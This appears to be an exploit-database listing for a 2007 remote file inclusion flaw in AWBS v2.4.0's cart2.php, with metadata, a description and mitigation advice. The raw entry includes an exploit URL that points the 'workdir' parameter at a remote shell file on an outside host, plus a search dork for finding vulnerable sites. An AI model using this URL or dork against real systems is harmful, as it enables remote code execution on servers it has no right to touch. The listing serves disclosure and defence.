header-logo
Suggest Exploit
vendor:
AWBS
by:
DamaR
7.5
CVSS
HIGH
Remote file inclusion
98
CWE
Product Name: AWBS
Affected Version From: 2.4.2000
Affected Version To: 2.4.2000
Patch Exists: NO
Related CWE:
CPE: a:awbs:awbs:2.4.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

AWBS v2.4.0 Remote file include[cart2.php]

The AWBS v2.4.0 application is vulnerable to remote file inclusion. An attacker can include a remote file in the 'workdir' parameter of the 'cart2.php' script. This can lead to arbitrary code execution or information disclosure.

Mitigation:

Apply the vendor-supplied patch or upgrade to a newer version of AWBS that addresses the vulnerability. Also, ensure that user-supplied input is properly validated and sanitized before being used in file inclusion operations.
Source

Exploit-DB raw data:

#AWBS v2.4.0  Remote file include[cart2.php]

#Demo  : http://www.awbs.com/demo.php

#D0rk : Ä°nurl:awbs.php

#Home Page: Www.SiberAktif.Net

#Exploit


#http://localhost/[gpb_path]/docs/front-end-demo/cart2.php?workdir=http://sh3ll.com/for.txt?


#Discovered by : DamaR

#By.Damar@Hotmail.Com

# milw0rm.com [2007-04-24]